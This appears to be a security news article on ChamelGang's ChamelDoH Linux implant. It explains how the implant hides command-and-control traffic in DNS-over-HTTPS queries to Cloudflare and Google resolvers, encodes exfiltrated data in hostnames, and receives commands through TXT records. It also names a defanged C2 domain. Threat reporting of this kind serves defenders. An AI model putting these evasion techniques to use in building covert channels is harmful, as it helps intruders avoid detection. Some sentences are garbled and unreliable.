Posted on June 15, 2023 at 6:30 AM

Chinese-Affiliated Hacker Group ChamelGang Exploits DNS-Over-HTTPS Communications

ChamelGang, a Chinese-affiliated threat actor group, has been found to infect Linux devices with a previously unknown implant known as “ChamelDoH. This implant supports DNS-over-HTTPS communications with the servers belonging to the attackers.

Chinese hackers exploit DNS-over-HTTPS communications

The threat actor behind this exploit was first documented in September 2021, with Positive Technologies being behind the discovery. However, the research conducted by Positive Technologies solely focused on the Windows toolkit, and it did not have a massive effect.

Stairwell published a report detailing the hacking activity. The report has described a new Linux implant that has been written in the C++ programing language that expands the intrusion arsenal of the hacker and also clearly shows the indicators of compromise used by these attackers.

The connection between ChamelGang and the new Linux malware is dependent on a domain that was previously linked with the threat actor and a tailored privilege elevation feature that was detected by Positive Technologies in the past hacking campaigns that were conducted by ChamelGang.

Hackers exploited DNS-over-HTTPs for malware communication

The domain name system (DNS) protocol is used by software and operating systems to install human-readable hostnames into IP addresses. These hostnames are later used to create network connections.

The DNS queries that are sent to the attackers are usually not encrypted, and they are in plain text. These DNS queries enable internet service providers (ISPs), organizations, and others to monitor the DNS requests.

Unencrypted DNS queries are usually deemed to be a privacy risk, and they allow governments to censor the Internet. In order to solve this issue, a DNS protocol known as DNS-over-HTTPS was created to encrypt the DNS queries to ensure that governments cannot snoop on these queries.

However, the encryption of these DNS queries is a double-edged sword, and there is a possibility that malware can exploit it as an effective channel of communication. The process makes it challenging for security software to monitor malicious network communications.

In the case of ChamelDoH, the DNS-over-HTTPS offers encrypted communication between the infected device and the command and control server. The move makes the malicious queries to be different from the regular HTTPS traffic.

DOH can also be used to bypass the local DNS servers through servers that are compatible with DoH. These servers were offered by reputable organizations, which is something that was not observed in the recent case.

The DNS requests rely on legitimate DoH servers from Cloudflare and Google servers. The process of blocking these servers is usually impossible, and it does cause any effect on legitimate traffic.

ChamelDoH also deploys two keys that exist within the JSON configuration, known as the “ns_record” and “doh.” These keys are deployed to get the C2 hostnames and a list of the legitimate DoH cloud providers that can be exploited after performing DoH queries.

The communications done by this malware have been encrypted with the AES128, and they also come with an altered base64 encoding with substitutes for the non-alphanumeric characters. The data that is transmitted by this malware is later included in the form of hostnames within the malware command and control servers.

The modification enables the malware to issue TXT requests for the domains that have encoded command and control server communications. It also hides the nature of the requests while also lowering the possibility of the hacking activities being detected.

According to Bleeping Computer, when one creates a query for the TXT record, the DoH query from the malware will be activated, and it will use <encoded_data>.ns2.spezialsec[.].com. The malicious name server that obtains the query will later extract and decrypt the encoded portion. It will receive the exfiltrated data from the device that is infected.

The C2 server will respond to the query with an encoded TXT record that contains the commands that the malware should run on the device that is infected. After the execution is complete, the malware will collect the basic data on the host, such as the name, IP address, CPU architecture, and system version, to create a unique ID.

The researchers at Stairwell have detected that ChamelDoH supported a wide range of commands that can be issued by its operators remotely through the TXT records. These commands are received through the DNS-over-HTTPs requests.

The analysis by Stairwell also shows that ChamelDoH was initially uploaded to VirusTotal in December last year. The AV engines at the platform are yet to flag this malware as malicious, exposing more internet users to exploits.